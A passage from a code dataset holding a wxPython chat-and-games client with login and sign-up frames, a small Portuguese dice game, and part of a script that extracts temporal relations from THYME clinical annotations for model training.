wx.lib.mixins.gridlabelrenderer as glr\n\n\n# signUp\nclass SignUp(wx.Frame):\n def __init__(self): # create sign up frame\n wx.Frame.__init__(self, None, title=\"Sign Up\", size=(430, 320),\n pos=(185, 130))\n self.SetBackgroundColour((153, 255, 153))\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(40)\n row = wx.BoxSizer(wx.HORIZONTAL)\n row.AddSpacer(100)\n\n lbl1 = wx.StaticText(self, label=\"Create an account\")\n lbl1.SetFont(wx.Font(22, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row.Add(lbl1)\n col.Add(row)\n\n col.AddSpacer(20)\n row6 = wx.BoxSizer(wx.HORIZONTAL)\n row6.AddSpacer(80)\n self.name = wx.TextCtrl(self, size=wx.Size(110, 22))\n self.name.Bind(wx.EVT_SET_FOCUS, self.remove_lbl3)\n row6.Add(self.name)\n row6.AddSpacer(45)\n lbl4 = wx.StaticText(self, label=\":Nickname\")\n lbl4.SetFont(wx.Font(16, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row6.Add(lbl4)\n col.Add(row6)\n\n row7 = wx.BoxSizer(wx.HORIZONTAL)\n row7.AddSpacer(75)\n self.nicknameError = wx.StaticText(self)\n self.nicknameError.SetFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.LIGHT))\n self.nicknameError.SetForegroundColour((255, 0, 0)) # set text color\n row7.Add(self.nicknameError)\n col.Add(row7)\n\n col.AddSpacer(5)\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(80)\n self.user = wx.TextCtrl(self, size=wx.Size(110, 22))\n self.user.Bind(wx.EVT_SET_FOCUS, self.remove_lbl2)\n row1.Add(self.user)\n row1.AddSpacer(45) # space between StaticText and TextCtrl\n lbl2 = wx.StaticText(self, label=\":Username\")\n lbl2.SetFont(wx.Font(16, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row1.Add(lbl2)\n col.Add(row1)\n\n row5 = wx.BoxSizer(wx.HORIZONTAL)\n row5.AddSpacer(70)\n self.usernameError = wx.StaticText(self)\n self.usernameError.SetFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.LIGHT))\n self.usernameError.SetForegroundColour((255, 0, 0)) # set text color\n row5.Add(self.usernameError)\n col.Add(row5)\n\n col.AddSpacer(5)\n row2 = wx.BoxSizer(wx.HORIZONTAL)\n row2.AddSpacer(80) # space between StaticText and TextCtrl\n self.password = wx.TextCtrl(self, size=wx.Size(110, 22),\n style=wx.TE_PASSWORD)\n row2.Add(self.password)\n row2.AddSpacer(45) # space between StaticText and TextCtrl\n lbl4 = wx.StaticText(self, label=\":Password\")\n self.password.Bind(wx.EVT_SET_FOCUS, self.remove_lbl1)\n lbl4.SetFont(wx.Font(16, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row2.Add(lbl4)\n col.Add(row2)\n\n row3 = wx.BoxSizer(wx.HORIZONTAL)\n row3.AddSpacer(70)\n self.passwordError = wx.StaticText(self)\n self.passwordError.SetFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.LIGHT))\n self.passwordError.SetForegroundColour((255, 0, 0))\n row3.Add(self.passwordError)\n col.Add(row3)\n\n col.AddSpacer(10)\n row4 = wx.BoxSizer(wx.HORIZONTAL)\n row4.AddSpacer(80)\n btn1 = wx.Button(self, label=\"sign up\")\n btn1.Bind(wx.EVT_BUTTON, self.check)\n row4.Add(btn1)\n row4.AddSpacer(70)\n cancel = wx.Button(self, label=\"cancel\")\n cancel.Bind(wx.EVT_BUTTON, self.cancel)\n row4.Add(cancel)\n col.Add(row4)\n\n self.SetSizer(col)\n self.Show()\n\n pub.subscribe(self.listener, \"update3\") # create a pubsub receiver\n self.valid = \"\"\n\n def remove_lbl1(self, event): # delete password error text\n self.passwordError.SetLabelText(\"\")\n self.password.SetBackgroundColour(\"white\")\n self.password.Clear()\n\n def remove_lbl2(self, event): # delete username error text\n self.usernameError.SetLabelText(\"\")\n self.user.SetBackgroundColour(\"white\")\n self.user.Clear()\n\n def remove_lbl3(self, event): # delete nickname error text\n self.nicknameError.SetLabelText(\"\")\n 
self.name.SetBackgroundColour(\"white\")\n self.name.Clear()\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n if info[1] == \"checkSignUp\": # sign up status\n self.valid = [info[2], info[3], info[4]]\n\n def check(self, event): # Check if user can sign up\n p = self.password.GetValue()\n u = self.user.GetValue()\n n = self.name.GetValue()\n msg = \"3,checkSignUp,\" + u + \",\" + n\n conn_q.put(msg)\n sleep(0.5)\n while self.valid == \"\":\n sleep(0.2)\n print(\"sleep\")\n cond1 = len(p) < 4\n cond2 = len(u) < 4\n cond3 = len(n) > 8 or len(n) < 1\n if self.valid[0] == \"True\" and cond1 is False and cond2 is False \\\n and cond3 is False: # sign up succeeded\n msg = \"3,insertUser,\" + u + \",\" + p + \",\" + n\n conn_q.put(msg)\n self.Destroy()\n else:\n if cond1:\n self.password.SetBackgroundColour(\"pink\")\n self.password.Refresh()\n self.passwordError.SetLabelText(\"Use at least \"\n \"4 characters\")\n if cond2 or self.valid[1] == \"0\":\n self.user.SetBackgroundColour(\"pink\")\n self.user.Refresh()\n if cond2:\n self.usernameError.SetLabelText(\"Use at least \"\n \"4 characters\")\n else:\n self.usernameError.SetLabelText(\"Username is \"\n \"already taken\")\n if cond3 or self.valid[2] == \"0\":\n self.name.SetBackgroundColour(\"pink\")\n self.name.Refresh()\n if cond3:\n self.nicknameError.SetLabelText(\"Use 1-8 characters\")\n else:\n self.nicknameError.SetLabelText(\"Nickname is \"\n \"already taken\")\n\n def cancel(self, event): # close sign up frame\n self.Close()\n\n\n# chat\nclass Chat(wx.Frame):\n\n def __init__(self, name): # create chat frame\n self.name = name\n wx.Frame.__init__(self, None, title=\"Chat\", size=(500, 450),\n pos=(150, 100))\n self.SetBackgroundColour('white')\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_erase_background)\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(30)\n\n row = wx.BoxSizer(wx.HORIZONTAL)\n row.AddSpacer(100)\n self.messageBox = wx.TextCtrl(self, size=wx.Size(300, 260),\n style=wx.TE_MULTILINE | wx.HSCROLL)\n self.messageBox.SetEditable(False)\n row.Add(self.messageBox)\n col.Add(row)\n col.AddSpacer(30)\n\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(70)\n send_btn = wx.Button(self, label='Send', size=wx.Size(80, 25))\n send_btn.Bind(wx.EVT_BUTTON, self.send_msg)\n row1.Add(send_btn)\n row1.AddSpacer(50)\n self.sendBox = wx.TextCtrl(self, size=wx.Size(200, 50))\n row1.Add(self.sendBox)\n col.Add(row1)\n\n self.SetSizer(col)\n self.Show()\n\n pub.subscribe(self.listener, \"update4\") # create a pubsub receiver\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n if info[1] == \"msg\": # user got chat message\n self.messageBox.AppendText(info[2] + \":\" + info[3] + '\\n')\n\n def send_msg(self, event): # send user's message\n msg1 = self.sendBox.GetValue()\n if msg1 != \"\":\n self.sendBox.Clear()\n msg = \"4,msg,\" + self.name + \",\" + msg1\n conn_q.put(msg)\n self.messageBox.AppendText(\"You: \" + msg1 + '\\n')\n\n def on_erase_background(self, evt): # add a picture to the background\n dc = evt.GetDC()\n if not dc:\n dc = wx.ClientDC(self)\n rect = self.GetUpdateRegion().GetBox()\n dc.SetClippingRect(rect)\n dc.Clear()\n image = wx.Image(\"chat.bmp\", wx.BITMAP_TYPE_ANY)\n bmp = wx.Bitmap(image)\n dc.DrawBitmap(bmp, 0, 0)\n\n\n# login\nclass Login(wx.Frame):\n def __init__(self): # create login frame\n 
wx.Frame.__init__(self, None, title=\"Login\", size=(430, 320),\n pos=(185, 130))\n self.SetBackgroundColour((181, 253, 246))\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(50)\n row = wx.BoxSizer(wx.HORIZONTAL)\n row.AddSpacer(235)\n\n lbl1 = wx.StaticText(self, label=\"login\")\n lbl1.SetFont(wx.Font(30, wx.FONTFAMILY_MODERN, wx.NORMAL, wx.BOLD))\n row.Add(lbl1)\n col.Add(row)\n\n col.AddSpacer(30)\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(80)\n self.user = wx.TextCtrl(self, size=wx.Size(110, 25))\n self.user.Bind(wx.EVT_SET_FOCUS, self.remove_lbl2)\n row1.Add(self.user)\n row1.AddSpacer(40) # space between StaticText and TextCtrl\n lbl2 = wx.StaticText(self, label=\":Username\")\n lbl2.SetFont(wx.Font(16, wx.FONTFAMILY_MODERN, wx.NORMAL, wx.BOLD))\n row1.Add(lbl2)\n col.Add(row1)\n\n col.AddSpacer(10)\n row2 = wx.BoxSizer(wx.HORIZONTAL)\n row2.AddSpacer(80) # space between StaticText and TextCtrl\n self.password = wx.TextCtrl(self, size=wx.Size(110, 25),\n style=wx.TE_PASSWORD)\n row2.Add(self.password)\n row2.AddSpacer(42) # space between StaticText and TextCtrl\n lbl3 = wx.StaticText(self, label=\":Password\")\n self.password.Bind(wx.EVT_SET_FOCUS, self.remove_lbl1)\n lbl3.SetFont(wx.Font(16, wx.FONTFAMILY_MODERN, wx.NORMAL, wx.BOLD))\n row2.Add(lbl3)\n col.Add(row2)\n\n row3 = wx.BoxSizer(wx.HORIZONTAL)\n row3.AddSpacer(122)\n self.error = wx.StaticText(self)\n self.error.SetForegroundColour((255, 0, 0))\n row3.Add(self.error)\n col.AddSpacer(10)\n col.Add(row3)\n\n row4 = wx.BoxSizer(wx.HORIZONTAL)\n row4.AddSpacer(80)\n btn1 = wx.Button(self, label=\"Login\")\n btn1.Bind(wx.EVT_BUTTON, self.login)\n row4.Add(btn1)\n\n row4.AddSpacer(25) # space between StaticText and TextCtrl\n btn2 = wx.Button(self, label=\"Sign up\")\n btn2.Bind(wx.EVT_BUTTON, self.sign_up)\n row4.Add(btn2)\n col.AddSpacer(20)\n col.Add(row4)\n\n self.SetSizer(col)\n self.Show()\n\n pub.subscribe(self.listener, \"update2\") # create a pubsub receiver\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n if info[1] == \"checkLogin\": # login status\n if info[2] == \"True\":\n if info[4] == \"1\":\n self.error.SetLabelText(\".The user is already logged in\")\n else: # login succeeded\n msg = \"1,clientName\" + \",\" + info[3]\n conn_q.put(msg)\n self.Close()\n else:\n self.error.SetLabelText(\".Incorrect username or password\")\n\n def login(self, event): # send username and password\n u = self.user.GetValue()\n p = self.password.GetValue()\n msg = \"2,checkLogin,\" + u + \",\" + p\n conn_q.put(msg)\n\n def sign_up(self, event): # open sign up frame\n SignUp()\n self.user.Clear()\n self.password.Clear()\n self.error.SetLabelText(\"\")\n\n def remove_lbl1(self, event): # delete password error text\n self.error.SetLabelText(\"\")\n self.password.Clear()\n\n def remove_lbl2(self, event): # delete username error text\n self.error.SetLabelText(\"\")\n self.user.Clear()\n\n\n# MainFrame\nclass MainFrame(wx.Frame):\n name = \"\"\n def __init__(self): # create main Frame (main menu)\n wx.Frame.__init__(self, None, title=\"CHAT PARTY\", size=(500, 450),\n pos=(150, 100))\n self.SetBackgroundColour('white')\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_erase_background)\n self.Bind(wx.EVT_CLOSE, self.close_frame)\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(55)\n row = wx.BoxSizer(wx.HORIZONTAL)\n row.AddSpacer(50) # space between StaticText and TextCtrl\n\n lbl1 = wx.StaticText(self, label=\"Chat 
party\")\n lbl1.SetFont(wx.Font(38, wx.FONTFAMILY_ROMAN, wx.NORMAL, wx.BOLD))\n row.Add(lbl1)\n col.Add(row)\n\n col.AddSpacer(20)\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(200)\n self.connect = wx.Button(self, label=\"connect\")\n self.connect.SetBackgroundColour((112, 193, 249))\n self.connect.Bind(wx.EVT_BUTTON, self.connect_to_server)\n row1.Add(self.connect)\n col.Add(row1)\n\n col.AddSpacer(20)\n row2 = wx.BoxSizer(wx.HORIZONTAL)\n row2.AddSpacer(170)\n self.login = wx.Button(self, label=\"login\", size=wx.Size(150, 70))\n self.login.SetBitmap(wx.Bitmap(\"login.bmp\", wx.BITMAP_TYPE_ANY))\n self.login.SetBackgroundColour((255, 255, 255))\n self.login.Bind(wx.EVT_BUTTON, self.login1)\n self.login.Disable()\n row2.Add(self.login)\n col.Add(row2)\n\n col.AddSpacer(20)\n row3 = wx.BoxSizer(wx.HORIZONTAL)\n row3.AddSpacer(170)\n self.signUp = wx.Button(self, label=\"Sign up\", size=wx.Size(150, 70))\n self.signUp.SetBitmapLabel(wx.Bitmap(\"sign up.bmp\",\n wx.BITMAP_TYPE_ANY))\n self.signUp.SetBackgroundColour((255, 255, 255))\n self.signUp.Bind(wx.EVT_BUTTON, self.sign_up1)\n self.signUp.Disable()\n row3.Add(self.signUp)\n col.Add(row3)\n\n self.SetSizer(col)\n self.Show()\n\n def close_frame(self, event): # close frame\n print(\" close frame\")\n msg = \"close\"\n conn_q.put(msg)\n self.Destroy()\n\n def on_erase_background(self, evt): # add a picture to the background\n dc = evt.GetDC()\n if not dc:\n dc = wx.ClientDC(self)\n rect = self.GetUpdateRegion().GetBox()\n dc.SetClippingRect(rect)\n dc.Clear()\n image = wx.Image(\"main.bmp\", wx.BITMAP_TYPE_ANY)\n bmp = wx.Bitmap(image)\n dc.DrawBitmap(bmp, 0, 0)\n\n def connect_to_server(self, event): # trying connect to the server\n comm_thread = Thread(target=client_send, args=()) # create tread\n comm_thread.start()\n pub.subscribe(self.listener, \"update1\") # create a pubsub receiver\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n if info[0] == \"error\": # connection with server failed\n r = wx.MessageBox(info[1], \"Connection error\")\n if r == wx.OK:\n self.Destroy()\n\n else:\n info = tmp.split(\",\")\n if info[1] == \"connect\": # connection with server succeeded\n self.connect.Hide()\n self.signUp.Enable()\n self.login.Enable()\n\n if info[1] == \"clientName\": # get user's nickname\n MainFrame.name = info[2]\n self.login.Bind(wx.EVT_BUTTON, self.chat)\n self.login.SetLabel(\"chat\")\n self.login.SetBackgroundColour('white')\n self.login.SetBitmapLabel(wx.Bitmap(\"gameIcon.bmp\",\n wx.BITMAP_TYPE_ANY))\n self.signUp.Bind(wx.EVT_BUTTON, self.game)\n self.signUp.SetBackgroundColour('white')\n self.signUp.SetBitmapLabel(wx.Bitmap(\"chatIcon.bmp\",\n wx.BITMAP_TYPE_ANY))\n self.signUp.SetLabel(\"games\")\n\n def login1(self, event): # open login frame\n Login()\n\n def sign_up1(self, event): # open sign up frame\n SignUp()\n\n def chat(self, event): # open chat frame\n Chat(MainFrame.name)\n\n def game(self, event): # open games menu frame\n Games(MainFrame.name)\n\n\n# games menu\nclass Games(wx.Frame):\n def __init__(self, name): # create games menu frame\n self.name = name # player's name\n self.rivalName = \"\" # rival's name\n wx.Frame.__init__(self, None, -1, 'games menu', size=(500, 450),\n pos=(150, 100))\n self.SetBackgroundColour('white')\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_erase_background)\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(35)\n row = wx.BoxSizer(wx.HORIZONTAL)\n 
row.AddSpacer(70)\n\n lbl = wx.StaticText(self, label=\"choose a game to play\")\n lbl.SetFont(wx.Font(30, wx.FONTFAMILY_ROMAN, wx.FONTSTYLE_ITALIC, wx.BOLD))\n row.Add(lbl)\n col.Add(row)\n\n col.AddSpacer(50)\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(60)\n self.xo = wx.Button(self, label=\"tic tac toe\")\n self.xo.SetFont(wx.Font(16, wx.FONTFAMILY_TELETYPE, wx.NORMAL, wx.BOLD))\n self.xo.Bind(wx.EVT_BUTTON, self.tic_tac_toe)\n row1.Add(self.xo)\n\n row1.AddSpacer(20)\n self.enter1 = wx.Button(self, label=\"enter game\", size=wx.Size(70, 35))\n self.enter1.Bind(wx.EVT_BUTTON, self.open_xo)\n row1.Add(self.enter1)\n self.enter1.Disable()\n col.Add(row1)\n\n col.AddSpacer(40)\n row2 = wx.BoxSizer(wx.HORIZONTAL)\n row2.AddSpacer(60)\n self.rps = wx.Button(self, label=\"rock paper scissors\")\n self.rps.SetFont(wx.Font(16, wx.FONTFAMILY_TELETYPE, wx.NORMAL, wx.BOLD))\n self.rps.Bind(wx.EVT_BUTTON, self.rock_paper_scissors)\n row2.Add(self.rps)\n\n row2.AddSpacer(20)\n self.enter2 = wx.Button(self, label=\"enter game\", size=wx.Size(70, 35))\n self.enter2.Bind(wx.EVT_BUTTON, self.open_rps)\n row2.Add(self.enter2)\n self.enter2.Disable()\n col.Add(row2)\n\n col.AddSpacer(40)\n row3 = wx.BoxSizer(wx.HORIZONTAL)\n row3.AddSpacer(60)\n best = wx.Button(self, label=\"best scores\")\n best.SetFont(wx.Font(16, wx.FONTFAMILY_TELETYPE, wx.NORMAL, wx.BOLD))\n best.Bind(wx.EVT_BUTTON, self.best_players)\n row3.Add(best)\n col.Add(row3)\n\n self.SetSizer(col)\n self.Show()\n pub.subscribe(self.listener, \"update5\") # create a pubsub receiver\n\n def on_erase_background(self, evt): # add a picture to the background\n dc = evt.GetDC()\n if not dc:\n dc = wx.ClientDC(self)\n rect = self.GetUpdateRegion().GetBox()\n dc.SetClippingRect(rect)\n dc.Clear()\n image = wx.Image(\"game.bmp\", wx.BITMAP_TYPE_ANY)\n bmp = wx.Bitmap(image)\n dc.DrawBitmap(bmp, 0, 0)\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n if info[1] == \"xo\":\n if info[2] == \"playing\":\n wx.MessageBox(\"you are already in a game\", \"no\")\n self.Destroy()\n else: # user can connect to tic tac toe game\n self.rivalName = info[2]\n self.enter1.Enable()\n self.rps.Disable()\n self.xo.Disable()\n\n if info[1] == \"rps\":\n if info[2] == \"playing\":\n wx.MessageBox(\"you are already in a game\", \"no\")\n self.Destroy()\n else: # user can connect to rock paper scissors game\n self.rivalName = info[2]\n self.enter2.Enable()\n self.rps.Disable()\n self.xo.Disable()\n\n def open_xo(self, event): # open tic tac toe frame\n ticTacToe.start(self.name, self.rivalName)\n self.Close()\n\n def open_rps(self, event): # open rock paper scissors frame\n rockPaperScissors.start(self.name, self.rivalName)\n self.Close()\n\n def tic_tac_toe(self, event): # trying open tic tac toe frame\n msg = \"5,xo,\" + self.name\n conn_q.put(msg)\n\n # trying open rock paper scissors frame\n def rock_paper_scissors(self, event):\n msg = \"5,rps,\" + self.name\n conn_q.put(msg)\n\n def best_players(self, event):\n BestPlayers()\n msg = \"6,bestPlayers\"\n conn_q.put(msg)\n\n# best players\nclass BestPlayers(wx.Frame):\n def __init__(self): # create games menu frame\n wx.Frame.__init__(self, None, -1, 'Best Scores', size=(500, 450),\n pos=(150, 100))\n self.SetBackgroundColour((224, 179, 255))\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(30)\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(100)\n lbl1 = wx.StaticText(self, label=\"Tic Tac Toe - top 
3 players\")\n lbl1.SetFont(wx.Font(18, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row1.Add(lbl1)\n col.Add(row1)\n\n col.AddSpacer(5)\n row2 = wx.BoxSizer(wx.HORIZONTAL)\n row2.AddSpacer(80)\n self.xo_grid = grid.Grid(self)\n self.xo_grid.CreateGrid(3, 2)\n self.set_grid_size(self.xo_grid)\n row2.Add(self.xo_grid)\n col.Add(row2)\n\n col.AddSpacer(25)\n row3 = wx.BoxSizer(wx.HORIZONTAL)\n row3.AddSpacer(65)\n lbl2 = wx.StaticText(self, label=\"Rock Paper Scissors - top 3 players\")\n lbl2.SetFont(wx.Font(18, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row3.Add(lbl2)\n col.Add(row3)\n\n col.AddSpacer(5)\n row4 = wx.BoxSizer(wx.HORIZONTAL)\n row4.AddSpacer(80)\n self.rps_grid = grid.Grid(self)\n self.rps_grid.CreateGrid(3, 2)\n self.set_grid_size(self.rps_grid)\n\n row4.Add(self.rps_grid)\n col.Add(row4)\n\n self.SetSizer(col)\n self.Show()\n\n pub.subscribe(self.listener, \"update6\") # create a pubsub receiver\n\n def set_grid_size(self, grid):\n grid.DisableDragRowSize()\n grid.DisableDragColSize()\n grid.SetColLabelValue(0, \"NAME\")\n grid.SetColLabelValue(1, \"SCORE\")\n for i in range(2):\n grid.SetRowSize(i, 30)\n grid.SetColSize(i, 120)\n grid.SetRowSize(2, 30)\n\n def set_scores(self, players_list, grid): # set best scores in the right table\n counter = 0\n num = len(players_list)/2\n for i in range(int(num)):\n for j in range(2):\n grid.SetReadOnly(i, j, True)\n grid.SetCellFont(i, j, wx.Font(16, wx.SWISS, wx.NORMAL, wx.BOLD))\n grid.SetCellBackgroundColour(i, j,(206, 126, 206))\n grid.SetCellValue(i, j, players_list[counter])\n counter = counter + 1\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n\n if info[1] == \"bestPlayers\":\n xo_players = info[2]\n xo_players_list = xo_players.split(\".\")\n xo_players_list.pop()\n print(\"players: \" + str(xo_players_list))\n self.set_scores(xo_players_list, self.xo_grid)\n rps_players = info[3]\n rps_players_list = rps_players.split(\".\")\n xo_players_list.pop()\n print(\"players: \" + str(rps_players_list))\n self.set_scores(rps_players_list, self.rps_grid)\n\nif __name__ == \"__main__\":\n app = wx.App(False)\n frame = MainFrame()\n app.MainLoop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"494548291","text":"import random\n\n\ndef jogar():\n imprime_abertura()\n\n numero_secreto = random.randrange(1,7)\n\n nivel = escolha_nivel()\n\n while nivel < 1 or nivel > 2:\n nivel = nivel_errado()\n\n if (nivel == 1):\n print(\"Numero do dado é {} :\".format(numero_secreto))\n else:\n print(\"Ok!! Obrigado\")\n\ndef imprime_abertura():\n print(\"*********************************\")\n print(\"Bem vindo ao jogo de Dados!\")\n print(\"*********************************\")\n\n\ndef escolha_nivel():\n print(\"Você quer Jogar dados?\")\n print(\"(1) sim (2) não \")\n\n nivel = int(input(\"\"))\n return nivel\n\n\ndef nivel_errado():\n nivel = int(input(\"Esta opção não existe. 
Você quer jogar dados (1) sim (2) não : \"))\n return nivel\n\n\nif (__name__ == \"__main__\"):\n jogar()","sub_path":"jogodados.py","file_name":"jogodados.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"533485314","text":"#!/usr/bin/env python3\n\nfrom transformers import T5Tokenizer\n\nimport sys\nsys.dont_write_bytecode = True\nsys.path.append('../Anafora')\n\nimport os, argparse\nfrom tqdm import tqdm\nfrom cassis import *\nfrom dataset_base import ThymeDataset\n\n# ctakes type system types\nrel_type = 'org.apache.ctakes.typesystem.type.relation.TemporalTextRelation'\nevent_type = 'org.apache.ctakes.typesystem.type.textsem.EventMention'\ntime_type = 'org.apache.ctakes.typesystem.type.textsem.TimeMention'\nsent_type = 'org.apache.ctakes.typesystem.type.textspan.Sentence'\n\nclass Data(ThymeDataset):\n \"\"\"Thyme data\"\"\"\n\n def __init__(\n self,\n xmi_dir,\n tokenizer,\n max_input_length,\n max_output_length,\n partition,\n n_files):\n \"\"\"Thyme data\"\"\"\n\n super(Data, self).__init__(\n xmi_dir,\n tokenizer,\n max_input_length,\n max_output_length,\n n_files)\n\n self.partition = partition\n self.event_time_relations()\n\n @staticmethod\n def index_relations(gold_view):\n \"\"\"Map arguments to relation types\"\"\"\n\n rel_lookup = {}\n for rel in gold_view.select(rel_type):\n arg1 = rel.arg1.argument\n arg2 = rel.arg2.argument\n if rel.category == 'CONTAINS':\n rel_lookup[(arg1, arg2)] = rel.category\n\n return rel_lookup\n\n def event_time_relations(self):\n \"\"\"Extract event and time relations\"\"\"\n\n caption = 'event-time relations in %s' % self.partition\n for xmi_path in tqdm(self.xmi_paths, desc=caption):\n\n # does this xmi belong to the sought partition?\n xmi_file_name = xmi_path.split('/')[-1]\n id = int(xmi_file_name.split('_')[0][-3:])\n if id % 8 not in self.splits[self.partition]:\n continue\n\n xmi_file = open(xmi_path, 'rb')\n cas = load_cas_from_xmi(xmi_file, typesystem=self.type_system)\n gold_view = cas.get_view('GoldView')\n sys_view = cas.get_view('_InitialView')\n\n rel_lookup = Data.index_relations(gold_view)\n\n # iterate over sentences extracting relations\n for sent in sys_view.select(sent_type):\n sent_text = sent.get_covered_text().replace('\\n', '')\n\n # extract gold events and times\n events = []\n for event in gold_view.select_covered(event_type, sent):\n event_text = event.get_covered_text().replace('\\n', '')\n events.append(event_text)\n\n times = []\n for time in gold_view.select_covered(time_type, sent):\n time_text = time.get_covered_text().replace('\\n', '')\n times.append(time_text)\n\n # input string\n input_str = 'task: REL; sent: %s; events: %s; times: %s' % \\\n (sent_text, ', '.join(events), ', '.join(times))\n self.inputs.append(input_str)\n\n rels_in_sent = []\n # now extract event-time relations\n for event in gold_view.select_covered(event_type, sent):\n for time in gold_view.select_covered(time_type, sent):\n\n time_text = time.get_covered_text()\n event_text = event.get_covered_text()\n\n if (time, event) in rel_lookup:\n label = rel_lookup[(time, event)]\n rel_string = '%s(%s, %s)' % (label, time_text, event_text)\n rels_in_sent.append(rel_string)\n\n elif (event, time) in rel_lookup:\n label = rel_lookup[(event, time)]\n rel_string = '%s(%s, %s)' % (label, event_text, time_text)\n rels_in_sent.append(rel_string)\n\n if len(rels_in_sent) == 0:\n self.outputs.append('no event-time relations')\n else:\n 
self.outputs.append(' '.join(rels_in_sent))\n\n def events_event_relations(self):\n \"\"\"Very eventful\"\"\"\n\n caption = 'event-event relations in %s' % self.partition\n for xmi_path in tqdm(self.xmi_paths, desc=caption):\n\n # does this xmi belong to the sought partition?\n xmi_file_name = xmi_path.split('/')[-1]\n id = int(xmi_file_name.split('_')[0][-3:])\n if id % 8 not in self.splits[self.partition]:\n continue\n\n xmi_file = open(xmi_path, 'rb')\n cas = load_cas_from_xmi(xmi_file, typesystem=self.type_system)\n gold_view = cas.get_view('GoldView')\n sys_view = cas.get_view('_InitialView')\n\n rel_lookup = Data.index_relations(gold_view)\n\n # iterate over sentences extracting relations\n for sent in sys_view.select(sent_type):\n sent_text = sent.get_covered_text().replace('\\n', '')\n self.inputs.append('Relation extraction: ' + sent_text)\n\n rels_in_sent = []\n events_in_sent = list(gold_view.select_covered(event_type, sent))\n for i in range(0, len(events_in_sent)):\n for j in range(i + 1, len(events_in_sent)):\n\n event1 = events_in_sent[i]\n event2 = events_in_sent[j]\n\n if (event1, event2) in rel_lookup:\n label = rel_lookup[(event1, event2)]\n event1_text = event1.get_covered_text()\n event2_text = event2.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, event1_text, event2_text)\n rels_in_sent.append(rel_string)\n\n if (event2, event1) in rel_lookup:\n label = rel_lookup[(event2, event1)]\n event1_text = event1.get_covered_text()\n event2_text = event2.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, event2_text, event1_text)\n rels_in_sent.append(rel_string)\n\n if len(rels_in_sent) == 0:\n self.outputs.append('no event-event relations')\n else:\n self.outputs.append('event-event rels: ' + ' '.join(rels_in_sent))\n\n def extract_all_relations(self):\n \"\"\"Extract ee and et relations\"\"\"\n\n caption = 'all relations in %s' % self.partition\n for xmi_path in tqdm(self.xmi_paths, desc=caption):\n\n # does this xmi belong to the sought partition?\n xmi_file_name = xmi_path.split('/')[-1]\n id = int(xmi_file_name.split('_')[0][-3:])\n if id % 8 not in self.splits[self.partition]:\n continue\n\n xmi_file = open(xmi_path, 'rb')\n cas = load_cas_from_xmi(xmi_file, typesystem=self.type_system)\n gold_view = cas.get_view('GoldView')\n sys_view = cas.get_view('_InitialView')\n\n rel_lookup = Data.index_relations(gold_view)\n\n # iterate over sentences extracting relations\n for sent in sys_view.select(sent_type):\n sent_text = sent.get_covered_text().replace('\\n', '')\n self.inputs.append('Relation extraction: ' + sent_text)\n\n # event-time relations in this sentence\n et_rels_in_sent = []\n\n for event in gold_view.select_covered(event_type, sent):\n for time in gold_view.select_covered(time_type, sent):\n\n if (time, event) in rel_lookup:\n label = rel_lookup[(time, event)]\n time_text = time.get_covered_text()\n event_text = event.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, time_text, event_text)\n et_rels_in_sent.append(rel_string)\n\n if (event, time) in rel_lookup:\n label = rel_lookup[(event, time)]\n time_text = time.get_covered_text()\n event_text = event.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, event_text, time_text)\n et_rels_in_sent.append(rel_string)\n\n et_output = 'event-time relations: '\n if len(et_rels_in_sent) == 0:\n et_output = et_output + 'none'\n else:\n et_output = et_output + ' '.join(et_rels_in_sent)\n\n # event-event relations in this sentence\n ee_rels_in_sent = []\n\n events_in_sent = 
